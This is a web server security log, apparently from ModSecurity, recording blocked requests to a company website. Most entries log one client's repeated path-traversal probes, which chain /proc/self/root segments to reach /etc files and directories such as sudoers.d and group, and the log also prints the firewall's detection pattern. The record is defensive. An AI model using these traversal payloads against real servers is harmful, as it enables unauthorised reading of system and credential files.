[Mon Mar 16 09:38:15.574080 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.244.31:55554] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf5t7ABkC4fWIHEf8HYTAAAAEM"]
[Mon Mar 16 09:38:39.515527 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:49042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5z_9ocpUE4ed4uDzaRQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:38:41.930961 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:51928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf50Zqj1wV0Si-OkefWlgAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:39:08.600871 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:51932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf57HbQATo66fKoS7w6MAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:39:35.901326 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:40422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6B3jZBu2q05ozVU9DXwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:39:42.731427 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:48180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6DnbQATo66fKoS7w6OwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:39:45.106351 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:44032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6EY6lpbStxTqkSktcQwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:39:48.471385 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:44034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6FNSswJuvopo3lOhNXAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:39:53.614421 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:44046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6GZqj1wV0Si-OkefWxAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:01.276374 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:38524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6IZqj1wV0Si-OkefW0wAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:04.589941 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:59698] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6JP9ocpUE4ed4uDzaWAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:11.077264 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:59704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6K3jZBu2q05ozVU9DaQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:12.422372 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:58412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6LLABkC4fWIHEf8HYXgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:13.691411 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:58422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6LbysWC90G-1nBrAynQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:15.006594 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:58434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6L46lpbStxTqkSktcSgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:16.176323 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:58436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6MI6lpbStxTqkSktcSwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:17.506361 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:58452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6MY6lpbStxTqkSktcTQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:18.775540 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:58460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Mo6lpbStxTqkSktcTwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:19.926378 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:58474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6M46lpbStxTqkSktcUQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:21.192863 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:54058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Nf9ocpUE4ed4uDzaXQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:22.528765 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:54064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Npqj1wV0Si-OkefW5QAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:23.853921 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:54078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6N3jZBu2q05ozVU9DagAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
